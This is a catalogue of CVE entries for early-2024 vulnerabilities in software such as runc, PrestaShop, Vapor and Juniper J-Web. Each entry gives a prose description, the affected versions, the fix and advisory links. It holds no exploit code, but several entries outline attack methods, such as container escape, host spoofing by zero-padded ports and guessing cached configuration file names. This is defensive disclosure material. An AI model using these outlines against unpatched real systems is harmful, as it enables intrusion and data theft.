CVE 2024 21648 Candidate XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. The rollback action is missing a right protection, a user can rollback to a previous version of the page to gain rights they don't have anymore. The problem has been patched in XWiki 14.10.17, 15.5.3 and 15.8-rc-1 by ensuring that the rights are checked before performing the rollback. MISC:https://github.com/xwiki/xwiki-platform/commit/4de72875ca49602796165412741033bfdbf1e680 | URL:https://github.com/xwiki/xwiki-platform/commit/4de72875ca49602796165412741033bfdbf1e680 | MISC:https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-xh35-w7wg-95v3 | URL:https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-xh35-w7wg-95v3 | MISC:https://jira.xwiki.org/browse/XWIKI-21257 | URL:https://jira.xwiki.org/browse/XWIKI-21257 Assigned (20231229)
CVE 2024 21647 Candidate Puma is a web server for Ruby/Rack applications built for parallelism. Prior to version 6.4.2, puma exhibited incorrect behavior when parsing chunked transfer encoding bodies in a way that allowed HTTP request smuggling. Fixed versions limits the size of chunk extensions. Without this limit, an attacker could cause unbounded resource (CPU, network bandwidth) consumption. This vulnerability has been fixed in versions 6.4.2 and 5.6.8. MISC:https://github.com/puma/puma/commit/5fc43d73b6ff193325e657a24ed76dec79133e93 | URL:https://github.com/puma/puma/commit/5fc43d73b6ff193325e657a24ed76dec79133e93 | MISC:https://github.com/puma/puma/security/advisories/GHSA-c2f4-cvqm-65w2 | URL:https://github.com/puma/puma/security/advisories/GHSA-c2f4-cvqm-65w2 Assigned (20231229)
CVE 2024 21646 Candidate Azure uAMQP is a general purpose C library for AMQP 1.0. The UAMQP library is used by several clients to implement AMQP protocol communication. When clients using this library receive a crafted binary type data, an integer overflow or wraparound or memory safety issue can occur and may cause remote code execution. This vulnerability has been patched in release 2024-01-01. MISC:https://github.com/Azure/azure-uamqp-c/commit/12ddb3a31a5a97f55b06fa5d74c59a1d84ad78fe | URL:https://github.com/Azure/azure-uamqp-c/commit/12ddb3a31a5a97f55b06fa5d74c59a1d84ad78fe | MISC:https://github.com/Azure/azure-uamqp-c/security/advisories/GHSA-j29m-p99g-7hpv | URL:https://github.com/Azure/azure-uamqp-c/security/advisories/GHSA-j29m-p99g-7hpv Assigned (20231229)
CVE 2024 21645 Candidate pyLoad is the free and open-source Download Manager written in pure Python. A log injection vulnerability was identified in `pyload` allowing any unauthenticated actor to inject arbitrary messages into the logs gathered by `pyload`. Forged or otherwise, corrupted log files can be used to cover an attacker’s tracks or even to implicate another party in the commission of a malicious act. This vulnerability has been patched in version 0.5.0b3.dev77. MISC:https://github.com/pyload/pyload/commit/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d | URL:https://github.com/pyload/pyload/commit/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d | MISC:https://github.com/pyload/pyload/security/advisories/GHSA-ghmw-rwh8-6qmr | URL:https://github.com/pyload/pyload/security/advisories/GHSA-ghmw-rwh8-6qmr Assigned (20231229)
CVE 2024 21644 Candidate pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77. MISC:https://github.com/pyload/pyload/commit/bb22063a875ffeca357aaf6e2edcd09705688c40 | URL:https://github.com/pyload/pyload/commit/bb22063a875ffeca357aaf6e2edcd09705688c40 | MISC:https://github.com/pyload/pyload/security/advisories/GHSA-mqpq-2p68-46fv | URL:https://github.com/pyload/pyload/security/advisories/GHSA-mqpq-2p68-46fv Assigned (20231229)
CVE 2024 21643 Candidate IdentityModel Extensions for .NET provide assemblies for web developers that wish to use federated identity providers for establishing the caller's identity. Anyone leveraging the `SignedHttpRequest`protocol or the `SignedHttpRequestValidator`is vulnerable. Microsoft.IdentityModel trusts the `jku`claim by default for the `SignedHttpRequest`protocol. This raises the possibility to make any remote or local `HTTP GET` request. The vulnerability has been fixed in Microsoft.IdentityModel.Protocols.SignedHttpRequest. Users should update all their Microsoft.IdentityModel versions to 7.1.2 (for 7x) or higher, 6.34.0 (for 6x) or higher. MISC:https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/releases/tag/6.34.0 | URL:https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/releases/tag/6.34.0 | MISC:https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/releases/tag/7.1.2 | URL:https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/releases/tag/7.1.2 | MISC:https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/security/advisories/GHSA-rv9j-c866-gp5h | URL:https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/security/advisories/GHSA-rv9j-c866-gp5h | MISC:https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/wiki/jkucve | URL:https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/wiki/jkucve Assigned (20231229)
CVE 2024 21642 Candidate D-Tale is a visualizer for Pandas data structures. Users hosting versions D-Tale prior to 3.9.0 publicly can be vulnerable to server-side request forgery (SSRF), allowing attackers to access files on the server. Users should upgrade to version 3.9.0, where the `Load From the Web` input is turned off by default. The only workaround for versions earlier than 3.9.0 is to only host D-Tale to trusted users. MISC:https://github.com/man-group/dtale/commit/954f6be1a06ff8629ead2c85c6e3f8e2196b3df2 | URL:https://github.com/man-group/dtale/commit/954f6be1a06ff8629ead2c85c6e3f8e2196b3df2 | MISC:https://github.com/man-group/dtale/security/advisories/GHSA-7hfx-h3j3-rwq4 | URL:https://github.com/man-group/dtale/security/advisories/GHSA-7hfx-h3j3-rwq4 | MISC:https://github.com/man-group/dtale?tab=readme-ov-file#load-data--sample-datasets | URL:https://github.com/man-group/dtale?tab=readme-ov-file#load-data--sample-datasets Assigned (20231229)
CVE 2024 21641 Candidate Flarum is open source discussion platform software. Prior to version 1.8.5, the Flarum `/logout` route includes a redirect parameter that allows any third party to redirect users from a (trusted) domain of the Flarum installation to redirect to any link. For logged-in users, the logout must be confirmed. Guests are immediately redirected. This could be used by spammers to redirect to a web address using a trusted domain of a running Flarum installation. The vulnerability has been fixed and published as flarum/core v1.8.5. As a workaround, some extensions modifying the logout route can remedy this issue if their implementation is safe. MISC:https://github.com/flarum/flarum-core/commit/ee8b3b4ad1413a2b0971fdd9e40f812d2a3a9d3a | URL:https://github.com/flarum/flarum-core/commit/ee8b3b4ad1413a2b0971fdd9e40f812d2a3a9d3a | MISC:https://github.com/flarum/framework/commit/7d70328471cf3091d92d95c382d277aec7996176 | URL:https://github.com/flarum/framework/commit/7d70328471cf3091d92d95c382d277aec7996176 | MISC:https://github.com/flarum/framework/security/advisories/GHSA-733r-8xcp-w9mr | URL:https://github.com/flarum/framework/security/advisories/GHSA-733r-8xcp-w9mr Assigned (20231229)
CVE 2024 21640 Candidate Chromium Embedded Framework (CEF) is a simple framework for embedding Chromium-based browsers in other applications.`CefVideoConsumerOSR::OnFrameCaptured` does not check `pixel_format` properly, which leads to out-of-bounds read out of the sandbox. This vulnerability was patched in commit 1f55d2e. MISC:https://github.com/chromiumembedded/cef/commit/1f55d2e12f62cfdfbf9da6968fde2f928982670b | URL:https://github.com/chromiumembedded/cef/commit/1f55d2e12f62cfdfbf9da6968fde2f928982670b | MISC:https://github.com/chromiumembedded/cef/security/advisories/GHSA-3h3j-38xq-v7hh | URL:https://github.com/chromiumembedded/cef/security/advisories/GHSA-3h3j-38xq-v7hh Assigned (20231229)
CVE 2024 21639 Candidate CEF (Chromium Embedded Framework ) is a simple framework for embedding Chromium-based browsers in other applications. `CefLayeredWindowUpdaterOSR::OnAllocatedSharedMemory` does not check the size of the shared memory, which leads to out-of-bounds read outside the sandbox. This vulnerability was patched in commit 1f55d2e. MISC:https://github.com/chromiumembedded/cef/commit/1f55d2e12f62cfdfbf9da6968fde2f928982670b | URL:https://github.com/chromiumembedded/cef/commit/1f55d2e12f62cfdfbf9da6968fde2f928982670b | MISC:https://github.com/chromiumembedded/cef/security/advisories/GHSA-m375-jw5x-x8mg | URL:https://github.com/chromiumembedded/cef/security/advisories/GHSA-m375-jw5x-x8mg Assigned (20231229)
CVE 2024 21638 Candidate Azure IPAM (IP Address Management) is a lightweight solution developed on top of the Azure platform designed to help Azure customers manage their IP Address space easily and effectively. By design there is no write access to customers' Azure environments as the Service Principal used is only assigned the Reader role at the root Management Group level. Until recently, the solution lacked the validation of the passed in authentication token which may result in attacker impersonating any privileged user to access data stored within the IPAM instance and subsequently from Azure, causing an elevation of privilege. This vulnerability has been patched in version 3.0.0. MISC:https://github.com/Azure/ipam/commit/64ef2d07edf16ffa50f29c7e0e25d32d974b367f | URL:https://github.com/Azure/ipam/commit/64ef2d07edf16ffa50f29c7e0e25d32d974b367f | MISC:https://github.com/Azure/ipam/pull/218 | URL:https://github.com/Azure/ipam/pull/218 | MISC:https://github.com/Azure/ipam/security/advisories/GHSA-m8mp-jq4c-g8j6 | URL:https://github.com/Azure/ipam/security/advisories/GHSA-m8mp-jq4c-g8j6 Assigned (20231229)
CVE 2024 21637 Candidate Authentik is an open-source Identity Provider. Authentik is a vulnerable to a reflected Cross-Site Scripting vulnerability via JavaScript-URIs in OpenID Connect flows with `response_mode=form_post`. This relatively user could use the described attacks to perform a privilege escalation. This vulnerability has been patched in versions 2023.10.6 and 2023.8.6. MISC:https://github.com/goauthentik/authentik/releases/tag/version%2F2023.10.6 | URL:https://github.com/goauthentik/authentik/releases/tag/version%2F2023.10.6 | MISC:https://github.com/goauthentik/authentik/releases/tag/version%2F2023.8.6 | URL:https://github.com/goauthentik/authentik/releases/tag/version%2F2023.8.6 | MISC:https://github.com/goauthentik/authentik/security/advisories/GHSA-rjpr-7w8c-gv3j | URL:https://github.com/goauthentik/authentik/security/advisories/GHSA-rjpr-7w8c-gv3j Assigned (20231229)
CVE 2024 21636 Candidate view_component is a framework for building reusable, testable, and encapsulated view components in Ruby on Rails. Versions prior to 3.9.0 and 2.83.0 have a cross-site scripting vulnerability that has the potential to impact anyone rendering a component directly from a controller with the view_component gem. Note that only components that define a `#call` method (i.e. instead of using a sidecar template) are affected. The return value of the `#call` method is not sanitized and can include user-defined content. In addition, the return value of the `#output_postamble` methodis not sanitized, which can also lead to cross-site scripting issues. Versions 3.9.0 and 2.83.0 have been released and fully mitigate both the `#call` and the `#output_postamble` vulnerabilities. As a workaround, sanitize the return value of `#call`. MISC:https://github.com/ViewComponent/view_component/commit/0d26944a8d2730ea40e60eae23d70684483e5017 | URL:https://github.com/ViewComponent/view_component/commit/0d26944a8d2730ea40e60eae23d70684483e5017 | MISC:https://github.com/ViewComponent/view_component/commit/c43d8bafa7117cbce479669a423ab266de150697 | URL:https://github.com/ViewComponent/view_component/commit/c43d8bafa7117cbce479669a423ab266de150697 | MISC:https://github.com/ViewComponent/view_component/pull/1950 | URL:https://github.com/ViewComponent/view_component/pull/1950 | MISC:https://github.com/ViewComponent/view_component/pull/1962 | URL:https://github.com/ViewComponent/view_component/pull/1962 | MISC:https://github.com/ViewComponent/view_component/security/advisories/GHSA-wf2x-8w6j-qw37 | URL:https://github.com/ViewComponent/view_component/security/advisories/GHSA-wf2x-8w6j-qw37 Assigned (20231229)
CVE 2024 21634 Candidate Amazon Ion is a Java implementation of the Ion data notation. Prior to version 1.10.5, a potential denial-of-service issue exists in `ion-java` for applications that use `ion-java` to deserialize Ion text encoded data, or deserialize Ion text or binary encoded data into the `IonValue` model and then invoke certain `IonValue` methods on that in-memory representation. An actor could craft Ion data that, when loaded by the affected application and/or processed using the `IonValue` model, results in a `StackOverflowError` originating from the `ion-java` library. The patch is included in `ion-java` 1.10.5. As a workaround, do not load data which originated from an untrusted source or that could have been tampered with. MISC:https://github.com/amazon-ion/ion-java/security/advisories/GHSA-264p-99wq-f4j6 | URL:https://github.com/amazon-ion/ion-java/security/advisories/GHSA-264p-99wq-f4j6 Assigned (20231229)
CVE 2024 21633 Candidate Apktool is a tool for reverse engineering Android APK files. In versions 2.9.1 and prior, Apktool infers resource files' output path according to their resource names which can be manipulated by attacker to place files at desired location on the system Apktool runs on. Affected environments are those in which an attacker may write/overwrite any file that user has write access, and either user name is known or cwd is under user folder. Commit d348c43b24a9de350ff6e5bd610545a10c1fc712 contains a patch for this issue. MISC:https://github.com/iBotPeaches/Apktool/commit/d348c43b24a9de350ff6e5bd610545a10c1fc712 | URL:https://github.com/iBotPeaches/Apktool/commit/d348c43b24a9de350ff6e5bd610545a10c1fc712 | MISC:https://github.com/iBotPeaches/Apktool/security/advisories/GHSA-2hqv-2xv4-5h5w | URL:https://github.com/iBotPeaches/Apktool/security/advisories/GHSA-2hqv-2xv4-5h5w Assigned (20231229)
CVE 2024 21632 Candidate omniauth-microsoft_graph provides an Omniauth strategy for the Microsoft Graph API. Prior to versions 2.0.0, the implementation did not validate the legitimacy of the `email` attribute of the user nor did it give/document an option to do so, making it susceptible to nOAuth misconfiguration in cases when the `email` is used as a trusted user identifier. This could lead to account takeover. Version 2.0.0 contains a fix for this issue. MISC:https://github.com/synth/omniauth-microsoft_graph/commit/f132078389612b797c872b45bd0e0b47382414c1 | URL:https://github.com/synth/omniauth-microsoft_graph/commit/f132078389612b797c872b45bd0e0b47382414c1 | MISC:https://github.com/synth/omniauth-microsoft_graph/security/advisories/GHSA-5g66-628f-7cvj | URL:https://github.com/synth/omniauth-microsoft_graph/security/advisories/GHSA-5g66-628f-7cvj | MISC:https://www.descope.com/blog/post/noauth | URL:https://www.descope.com/blog/post/noauth Assigned (20231229)
CVE 2024 21631 Candidate Vapor is an HTTP web framework for Swift. Prior to version 4.90.0, Vapor's `vapor_urlparser_parse` function uses `uint16_t` indexes when parsing a URI's components, which may cause integer overflows when parsing untrusted inputs. This vulnerability does not affect Vapor directly but could impact applications relying on the URI type for validating user input. The URI type is used in several places in Vapor. A developer may decide to use URI to represent a URL in their application (especially if that URL is then passed to the HTTP Client) and rely on its public properties and methods. However, URI may fail to properly parse a valid (albeit abnormally long) URL, due to string ranges being converted to 16-bit integers. An attacker may use this behavior to trick the application into accepting a URL to an untrusted destination. By padding the port number with zeros, an attacker can cause an integer overflow to occur when the URL authority is parsed and, as a result, spoof the host. Version 4.90.0 contains a patch for this issue. As a workaround, validate user input before parsing as a URI or, if possible, use Foundation's `URL` and `URLComponents` utilities. MISC:https://github.com/vapor/vapor/commit/6db3d917b5ce5024a84eb265ef65691383305d70 | URL:https://github.com/vapor/vapor/commit/6db3d917b5ce5024a84eb265ef65691383305d70 | MISC:https://github.com/vapor/vapor/security/advisories/GHSA-r6r4-5pr8-gjcp | URL:https://github.com/vapor/vapor/security/advisories/GHSA-r6r4-5pr8-gjcp Assigned (20231229)
CVE 2024 21630 Candidate Zulip is an open-source team collaboration tool. A vulnerability in version 8.0 is similar to CVE-2023-32677, but applies to multi-use invitations, not single-use invitation links as in the prior CVE. Specifically, it applies when the installation has configured non-admins to be able to invite users and create multi-use invitations, and has also configured only admins to be able to invite users to streams. As in CVE-2023-32677, this does not let users invite new users to arbitrary streams, only to streams that the inviter can already see. Version 8.1 fixes this issue. As a workaround, administrators can limit sending of invitations down to users who also have the permission to add users to streams. MISC:https://github.com/zulip/zulip/commit/0df7bd71f32f3b772e2646c6ab0d60c9b610addf | URL:https://github.com/zulip/zulip/commit/0df7bd71f32f3b772e2646c6ab0d60c9b610addf | MISC:https://github.com/zulip/zulip/security/advisories/GHSA-87p9-wprh-7rm6 | URL:https://github.com/zulip/zulip/security/advisories/GHSA-87p9-wprh-7rm6 | MISC:https://github.com/zulip/zulip/security/advisories/GHSA-mrvp-96q6-jpvc | URL:https://github.com/zulip/zulip/security/advisories/GHSA-mrvp-96q6-jpvc | MISC:https://zulip.com/help/configure-who-can-invite-to-streams | URL:https://zulip.com/help/configure-who-can-invite-to-streams | MISC:https://zulip.com/help/restrict-account-creation#change-who-can-send-invitations | URL:https://zulip.com/help/restrict-account-creation#change-who-can-send-invitations Assigned (20231229)
CVE 2024 21629 Candidate Rust EVM is an Ethereum Virtual Machine interpreter. In `rust-evm`, a feature called `record_external_operation` was introduced, allowing library users to record custom gas changes. This feature can have some bogus interactions with the call stack. In particular, during finalization of a `CREATE` or `CREATE2`, in the case that the substack execution happens successfully, `rust-evm` will first commit the substate, and then call `record_external_operation(Write(out_code.len()))`. If `record_external_operation` later fails, this error is returned to the parent call stack, instead of `Succeeded`. Yet, the substate commitment already happened. This causes smart contracts able to commit state changes, when the parent caller contract receives zero address (which usually indicates that the execution has failed). This issue only impacts library users with custom `record_external_operation` that returns errors. The issue is patched in release 0.41.1. No known workarounds are available. MISC:https://github.com/rust-ethereum/evm/blob/release-v041/src/executor/stack/executor.rs#L1012C25-L1012C69 | URL:https://github.com/rust-ethereum/evm/blob/release-v041/src/executor/stack/executor.rs#L1012C25-L1012C69 | MISC:https://github.com/rust-ethereum/evm/commit/d8991ec727ad0fb64fe9957a3cd307387a6701e4 | URL:https://github.com/rust-ethereum/evm/commit/d8991ec727ad0fb64fe9957a3cd307387a6701e4 | MISC:https://github.com/rust-ethereum/evm/pull/264 | URL:https://github.com/rust-ethereum/evm/pull/264 | MISC:https://github.com/rust-ethereum/evm/security/advisories/GHSA-27wg-99g8-2v4v | URL:https://github.com/rust-ethereum/evm/security/advisories/GHSA-27wg-99g8-2v4v Assigned (20231229)
CVE 2024 21628 Candidate PrestaShop is an open-source e-commerce platform. Prior to version 8.1.3, the isCleanHtml method is not used on this this form, which makes it possible to store a cross-site scripting payload in the database. The impact is low because the HTML is not interpreted in BO, thanks to twig's escape mechanism. In FO, the cross-site scripting attack is effective, but only impacts the customer sending it, or the customer session from which it was sent. This issue affects those who have a module fetching these messages from the DB and displaying it without escaping HTML. Version 8.1.3 contains a patch for this issue. MISC:https://github.com/PrestaShop/PrestaShop/commit/c3d78b7e49f5fe49a9d07725c3174d005deaa597 | URL:https://github.com/PrestaShop/PrestaShop/commit/c3d78b7e49f5fe49a9d07725c3174d005deaa597 | MISC:https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-vr7m-r9vm-m4wf | URL:https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-vr7m-r9vm-m4wf Assigned (20231229)
CVE 2024 21627 Candidate PrestaShop is an open-source e-commerce platform. Prior to versions 8.1.3 and 1.7.8.11, some event attributes are not detected by the `isCleanHTML` method. Some modules using the `isCleanHTML` method could be vulnerable to cross-site scripting. Versions 8.1.3 and 1.7.8.11 contain a patch for this issue. The best workaround is to use the `HTMLPurifier` library to sanitize html input coming from users. The library is already available as a dependency in the PrestaShop project. Beware though that in legacy object models, fields of `HTML` type will call `isCleanHTML`. MISC:https://github.com/PrestaShop/PrestaShop/commit/73cfb44666818eefd501b526a894fe884dd12129 | URL:https://github.com/PrestaShop/PrestaShop/commit/73cfb44666818eefd501b526a894fe884dd12129 | MISC:https://github.com/PrestaShop/PrestaShop/commit/ba06d18466df5b92cb841d504cc7210121104883 | URL:https://github.com/PrestaShop/PrestaShop/commit/ba06d18466df5b92cb841d504cc7210121104883 | MISC:https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-xgpm-q3mq-46rq | URL:https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-xgpm-q3mq-46rq Assigned (20231229)
CVE 2024 21626 Candidate runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. In runc 1.1.11 and earlier, due to an internal file descriptor leak, an attacker could cause a newly-spawned container process (from runc exec) to have a working directory in the host filesystem namespace, allowing for a container escape by giving access to the host filesystem ("attack 2"). The same attack could be used by a malicious image to allow a container process to gain access to the host filesystem through runc run ("attack 1"). Variants of attacks 1 and 2 could be also be used to overwrite semi-arbitrary host binaries, allowing for complete container escapes ("attack 3a" and "attack 3b"). runc 1.1.12 includes patches for this issue. FEDORA:FEDORA-2024-900dc7f6ff | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SYMO3BANINS6RGFQFKPRG4FIOJ7GWYTL/ | FEDORA:FEDORA-2024-9044c9eefa | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2NLXNE23Q5ESQUAI22Z7A63JX2WMPJ2J/ | MISC:http://packetstormsecurity.com/files/176993/runc-1.1.11-File-Descriptor-Leak-Privilege-Escalation.html | MISC:https://github.com/opencontainers/runc/commit/02120488a4c0fc487d1ed2867e901eeed7ce8ecf | URL:https://github.com/opencontainers/runc/commit/02120488a4c0fc487d1ed2867e901eeed7ce8ecf | MISC:https://github.com/opencontainers/runc/releases/tag/v1.1.12 | URL:https://github.com/opencontainers/runc/releases/tag/v1.1.12 | MISC:https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv | URL:https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv | MLIST:[debian-lts-announce] 20240219 [SECURITY] [DLA 3735-1] runc security update | URL:https://lists.debian.org/debian-lts-announce/2024/02/msg00005.html | MLIST:[oss-security] 20240201 Re: runc: CVE-2024-21626: high severity container breakout attack | URL:http://www.openwall.com/lists/oss-security/2024/02/01/1 | MLIST:[oss-security] 20240202 Re: Re: runc: CVE-2024-21626: high severity container breakout attack | URL:http://www.openwall.com/lists/oss-security/2024/02/02/3 Assigned (20231229)
CVE 2024 21625 Candidate SideQuest is a place to get virtual reality applications for Oculus Quest. The SideQuest desktop application uses deep links with a custom protocol (`sidequest://`) to trigger actions in the application from its web contents. Because, prior to version 0.10.35, the deep link URLs were not sanitized properly in all cases, a one-click remote code execution can be achieved in cases when a device is connected, the user is presented with a malicious link and clicks it from within the application. As of version 0.10.35, the custom protocol links within the electron application are now being parsed and sanitized properly. MISC:https://github.com/SideQuestVR/SideQuest/security/advisories/GHSA-3v86-cf9q-x4x7 | URL:https://github.com/SideQuestVR/SideQuest/security/advisories/GHSA-3v86-cf9q-x4x7 Assigned (20231229)
CVE 2024 21624 Candidate nonebot2 is a cross-platform Python asynchronous chatbot framework written in Python. This security advisory pertains to a potential information leak (e.g., environment variables) in instances where developers utilize `MessageTemplate` and incorporate user-provided data into templates. The identified vulnerability has been remedied in pull request #2509 and will be included in versions released from 2.2.0. Users are strongly advised to upgrade to these patched versions to safeguard against the vulnerability. A temporary workaround involves filtering underscores before incorporating user input into the message template. MISC:https://github.com/nonebot/nonebot2/pull/2509 | URL:https://github.com/nonebot/nonebot2/pull/2509 | MISC:https://github.com/nonebot/nonebot2/security/advisories/GHSA-59j8-776v-xxxg | URL:https://github.com/nonebot/nonebot2/security/advisories/GHSA-59j8-776v-xxxg Assigned (20231229)
CVE 2024 21623 Candidate OTCLient is an alternative tibia client for otserv. Prior to commit db560de0b56476c87a2f967466407939196dd254, the /mehah/otclient "`Analysis - SonarCloud`" workflow is vulnerable to an expression injection in Actions, allowing an attacker to run commands remotely on the runner, leak secrets, and alter the repository using this workflow. Commit db560de0b56476c87a2f967466407939196dd254 contains a fix for this issue. MISC:https://github.com/mehah/otclient/blob/72744edc3b9913b920e0fd12e929604f682fda75/.github/workflows/analysis-sonarcloud.yml#L91-L104 | URL:https://github.com/mehah/otclient/blob/72744edc3b9913b920e0fd12e929604f682fda75/.github/workflows/analysis-sonarcloud.yml#L91-L104 | MISC:https://github.com/mehah/otclient/commit/db560de0b56476c87a2f967466407939196dd254 | URL:https://github.com/mehah/otclient/commit/db560de0b56476c87a2f967466407939196dd254 | MISC:https://github.com/mehah/otclient/security/advisories/GHSA-q6gr-wc79-v589 | URL:https://github.com/mehah/otclient/security/advisories/GHSA-q6gr-wc79-v589 | MISC:https://securitylab.github.com/research/github-actions-preventing-pwn-requests/ | URL:https://securitylab.github.com/research/github-actions-preventing-pwn-requests/ | MISC:https://securitylab.github.com/research/github-actions-untrusted-input/ | URL:https://securitylab.github.com/research/github-actions-untrusted-input/ Assigned (20231229)
CVE 2024 21622 Candidate Craft is a content management system. This is a potential moderate impact, low complexity privilege escalation vulnerability in Craft starting in 3.x prior to 3.9.6 and 4.x prior to 4.4.16 with certain user permissions setups. This has been fixed in Craft 4.4.16 and Craft 3.9.6. Users should ensure they are running at least those versions. MISC:https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#4511---2023-11-16 | URL:https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#4511---2023-11-16 | MISC:https://github.com/craftcms/cms/blob/v3/CHANGELOG.md#396---2023-11-16 | URL:https://github.com/craftcms/cms/blob/v3/CHANGELOG.md#396---2023-11-16 | MISC:https://github.com/craftcms/cms/commit/76caf9af07d9964be0fd362772223be6a5f5b6aa | URL:https://github.com/craftcms/cms/commit/76caf9af07d9964be0fd362772223be6a5f5b6aa | MISC:https://github.com/craftcms/cms/commit/be81eb653d633833f2ab22510794abb6bb9c0843 | URL:https://github.com/craftcms/cms/commit/be81eb653d633833f2ab22510794abb6bb9c0843 | MISC:https://github.com/craftcms/cms/pull/13931 | URL:https://github.com/craftcms/cms/pull/13931 | MISC:https://github.com/craftcms/cms/pull/13932 | URL:https://github.com/craftcms/cms/pull/13932 | MISC:https://github.com/craftcms/cms/security/advisories/GHSA-j5g9-j7r4-6qvx | URL:https://github.com/craftcms/cms/security/advisories/GHSA-j5g9-j7r4-6qvx Assigned (20231229)
CVE 2024 21620 Candidate An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in J-Web of Juniper Networks Junos OS on SRX Series and EX Series allows an attacker to construct a URL that when visited by another user enables the attacker to execute commands with the target's permissions, including an administrator. A specific invocation of the emit_debug_note method in webauth_operation.php will echo back the data it receives. This issue affects Juniper Networks Junos OS on SRX Series and EX Series: * All versions earlier than 20.4R3-S10; * 21.2 versions earlier than 21.2R3-S8; * 21.4 versions earlier than 21.4R3-S6; * 22.1 versions earlier than 22.1R3-S5; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S2; * 22.4 versions earlier than 22.4R3-S1; * 23.2 versions earlier than 23.2R2; * 23.4 versions earlier than 23.4R2. MISC:https://supportportal.juniper.net/JSA76390 | URL:https://supportportal.juniper.net/JSA76390 Assigned (20231227)
CVE 2024 2162 Candidate An OS Command Injection vulnerability in Kiloview NDI allows a low-privileged user to execute arbitrary code remotely on the device with high privileges. This issue affects Kiloview NDI N3, N3-s, N4, N20, N30, N40 and was fixed in Firmware version 2.02.0227 . MISC:https://www.kiloview.com/en/support/download/1779/ | URL:https://www.kiloview.com/en/support/download/1779/ | MISC:https://www.kiloview.com/en/support/download/n20-firmware-download/ | URL:https://www.kiloview.com/en/support/download/n20-firmware-download/ | MISC:https://www.kiloview.com/en/support/download/n3-for-ndi/ | URL:https://www.kiloview.com/en/support/download/n3-for-ndi/ | MISC:https://www.kiloview.com/en/support/download/n3-s-firmware-download/ | URL:https://www.kiloview.com/en/support/download/n3-s-firmware-download/ | MISC:https://www.kiloview.com/en/support/download/n30-for-ndi/ | URL:https://www.kiloview.com/en/support/download/n30-for-ndi/ | MISC:https://www.kiloview.com/en/support/download/n40/ | URL:https://www.kiloview.com/en/support/download/n40/ Assigned (20240304)
CVE 2024 21619 Candidate A Missing Authentication for Critical Function vulnerability combined with a Generation of Error Message Containing Sensitive Information vulnerability in J-Web of Juniper Networks Junos OS on SRX Series and EX Series allows an unauthenticated, network-based attacker to access sensitive system information. When a user logs in, a temporary file which contains the configuration of the device (as visible to that user) is created in the /cache folder. An unauthenticated attacker can then attempt to access such a file by sending a specific request to the device trying to guess the name of such a file. Successful exploitation will reveal configuration information. This issue affects Juniper Networks Junos OS on SRX Series and EX Series: * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S7; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S6; * 22.1 versions earlier than 22.1R3-S5; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S2; * 22.4 versions earlier than 22.4R3; * 23.2 versions earlier than 23.2R1-S2, 23.2R2. MISC:https://supportportal.juniper.net/JSA76390 | URL:https://supportportal.juniper.net/JSA76390 Assigned (20231227)
CVE 2024 21617 Candidate An Incomplete Cleanup vulnerability in Nonstop active routing (NSR) component of Juniper Networks Junos OS allows an adjacent, unauthenticated attacker to cause memory leak leading to Denial of Service (DoS). On all Junos OS platforms, when NSR is enabled, a BGP flap will cause memory leak. A manual reboot of the system will restore the services. Note: NSR is not supported on the SRX Series and is therefore not affected by this vulnerability. The memory usage can be monitored using the below commands. user@host> show chassis routing-engine no-forwarding user@host> show system memory | no-more This issue affects: Juniper Networks Junos OS * 21.2 versions earlier than 21.2R3-S5; * 21.3 versions earlier than 21.3R3-S4; * 21.4 versions earlier than 21.4R3-S4; * 22.1 versions earlier than 22.1R3-S2; * 22.2 versions earlier than 22.2R3-S2; * 22.3 versions earlier than 22.3R2-S1, 22.3R3; * 22.4 versions earlier than 22.4R1-S2, 22.4R2. This issue does not affect Junos OS versions earlier than 20.4R3-S7. MISC:https://supportportal.juniper.net/JSA75758 | URL:https://supportportal.juniper.net/JSA75758 | MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N | URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N Assigned (20231227)
